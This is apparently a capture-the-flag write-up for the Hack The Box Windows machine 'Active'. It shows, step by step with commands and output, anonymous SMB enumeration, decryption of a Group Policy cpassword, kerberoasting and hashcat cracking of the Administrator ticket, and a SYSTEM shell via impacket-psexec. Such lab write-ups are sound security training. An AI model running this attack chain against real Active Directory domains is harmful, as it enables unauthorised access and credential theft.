> For the complete documentation index, see [llms.txt](https://vinetsuicide.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://vinetsuicide.gitbook.io/writeups/windows/easy-boxes/active.md).

# Active

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2FqlicApmLosVSBc6dW7nD%2FActive.png?alt=media&amp;token=feff2f11-c6d7-49ba-bec2-234d4cc44324" alt="" width="563"><figcaption></figcaption></figure>

### Recon

```bash
ping -c 1 10.10.10.100
PING 10.10.10.100 (10.10.10.100) 56(84) bytes of data.
64 bytes from 10.10.10.100: icmp_seq=1 ttl=127 time=63.6 ms

--- 10.10.10.100 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 63.608/63.608/63.608/0.000 ms
```

Because of TTL we can say that OS in Windows.

Lets scan a target.

```bash
sudo nmap -sC -sV 10.10.10.100 -Pn -p- -T5 -oN active
```

```bash
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-12 19:29:19Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows


Host script results:
| smb2-time: 
|   date: 2024-02-12T19:30:15
|_  start_date: 2024-02-12T19:19:44
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 558.07 seconds
```

### SMB

```bash
nxc smb 10.10.10.100 -u '' -p '' --shares
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\: 
SMB         10.10.10.100    445    DC               [*] Enumerated shares
SMB         10.10.10.100    445    DC               Share           Permissions     Remark
SMB         10.10.10.100    445    DC               -----           -----------     ------
SMB         10.10.10.100    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.100    445    DC               C$                              Default share
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC
SMB         10.10.10.100    445    DC               NETLOGON                        Logon server share 
SMB         10.10.10.100    445    DC               Replication     READ            
SMB         10.10.10.100    445    DC               SYSVOL                          Logon server share 
SMB         10.10.10.100    445    DC               Users                           
```

There is anonymous access to SMB, and we can read a "Replication" directory.

So lets connect.

```bash
smbclient //10.10.10.100/Replication
```

```bash
smb: \> ls
  .                                   D        0  Sat Jul 21 13:37:44 2018
  ..                                  D        0  Sat Jul 21 13:37:44 2018
  active.htb                          D        0  Sat Jul 21 13:37:44 2018

                5217023 blocks of size 4096. 284119 blocks available
smb: \> prompt OFF 
smb: \> recurse ON
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.5 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (6.8 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (2.0 KiloBytes/sec) (average 2.4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (4.1 KiloBytes/sec) (average 2.6 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (8.9 KiloBytes/sec) (average 3.9 KiloBytes/sec)
smb: \> exit
```

### svc\_tgs User

I have downloaded everything, so now we can check this files.

```bash
tree active.htb 
active.htb
├── DfsrPrivate
│   ├── ConflictAndDeleted
│   ├── Deleted
│   └── Installing
├── Policies
│   ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│   │   ├── GPT.INI
│   │   ├── Group Policy
│   │   │   └── GPE.INI
│   │   ├── MACHINE
│   │   │   ├── Microsoft
│   │   │   │   └── Windows NT
│   │   │   │       └── SecEdit
│   │   │   │           └── GptTmpl.inf
│   │   │   ├── Preferences
│   │   │   │   └── Groups
│   │   │   │       └── Groups.xml
│   │   │   └── Registry.pol
│   │   └── USER
│   └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│       ├── GPT.INI
│       ├── MACHINE
│       │   └── Microsoft
│       │       └── Windows NT
│       │           └── SecEdit
│       │               └── GptTmpl.inf
│       └── USER
└── scripts
```

Looks like nothing interesting except of "Groups.xml" file.

```bash
musor@kali:~/wu/Active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups$ cat Groups.xml  
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
```

There is encrypted password with username "svc\_tgs".

```bash
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
```

### Privilege Escalation

So now I have valid credentials, Im going to try kerberoasting.

```bash
impacket-GetUserSPNs 'ACTIVE.HTB/svc_tgs:GPPstillStandingStrong2k18' -dc-ip 10.10.10.100 -dc-host active.htb -request 
Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 22:06:40.351723  2024-02-12 22:20:48.774544             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$ACTIVE.HTB/Administrator*$6ba9c5faf07911645e76b8162e3f0ea3$b1d1b38a14477393280a1086286c72b13f737ccb9da561a5262600fc53e59cbd2f99cb0979c9ff4d3bb079fd4b8d2aeb8c8ea35efceec0e85486ff0f8b17ec7794c90443d77baf50771e80c95b442874c6f1a232069043792bd1dae9844f15aef9978db1917ace73fc96ad5e7626729498b595ddc70d606275dd832311946c21c9bcedff4b99caf6024957e8dcb696d5682590471439f4a99c68d8358d17567efbac19de70aa133e5cf7f894c1ee1fa4a93c78765e5c47dbde706e44b678cfa6622a8df33b51760d6fbacc1837039ac3d3499b70c16f396b1ae48a251cf9afb47209fbc1213ac5b4a006e64e300d9fc70c8001f526b890e2439d37fca81a0dc9da147536995a1a613294be85c9751ef4b5c572ee9af47c67277da26d38c3dbaf5196c67653099d33826e6f6ec0485db192d57e32237285e5eeb6a78df2b861c5a106486e24737b06c956ca95875398bfd0226f825eb0a1534997654c34f257d154fc5428729fff513349a09ca2bed09fd89ef9a585cefb583187d8594879f7c4ace9f7a3558eb0f6010e1a120bb3fb8ba97f710cf52fec42edcf8af615a4a1ebdd8b07ea7f63c1cd5e2264ef5832fb021a31f832739cb85a522c7f81bf9d79d1c194d3135b3fd01e0811713fd6510412afd9b0210a93300ab6ec547c206170ebed77a66a5eae16f5f9890f74dfac1eb57ddb42945d1441fc85f736de25df5dbe89d93d6d62e043f6512ad83658e51c40948d2ab25f1836a5ac5739b47e89b9e00a6a1731aaaf127676d3255a85ae946d853c3a1dc03184175a823f40e58c8b5211e214663ff9f70a0ecf194775e8cecbbf46baa46cc2828f3635b878e1301949e857193bbe5d4a44c87110b94adf974e5f7527c1953254c16180c4181977e86c218edda33d1148a9e2db7fa10354913428f30353ef043b9eba179f13cd7ff1cca17d6ac84d82991c4117931aad93ae628b508f94c6c131c0da84a8f37497148185c3c038da0e81bc733eaa04ea2f2b49eb1186d96db28dd4b58036bf81743fde3d4d7c3b687cbdb2490dff6be8f4ae80b0e7df14ae344313bd2b3ceffdc21f09883c3f36d255a2100157dbfe5612ff3f926da33d3773f2d26b9c0d98a6fef365afa9863542bef9cb390202e84121b33950f13fd1d49b94db855269f462e8514122323ebb2fdf38e7e6a0fde5c47b61fd45a309e24b384ee6cca8538c35f0cc160227903878273eeb55bdcdc7ec6378bbc25323b2ca6803cdd89d
```

So now we can crack it offline with Hashcat.

```bash
hashcat hash /usr/share/wordlists/rockyou.txt
```

And successfully I cracked this hash, password is  "Ticketmaster1968"

So now I have a password for Administrator, so Im going to use impacket-psexec to spawn a shell.

```bash
impacket-psexec 'ACTIVE.HTB/administrator:Ticketmaster1968'@10.10.10.100                               
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file DQjwPdFJ.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service Wsvt on 10.10.10.100.....
[*] Starting service Wsvt.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```
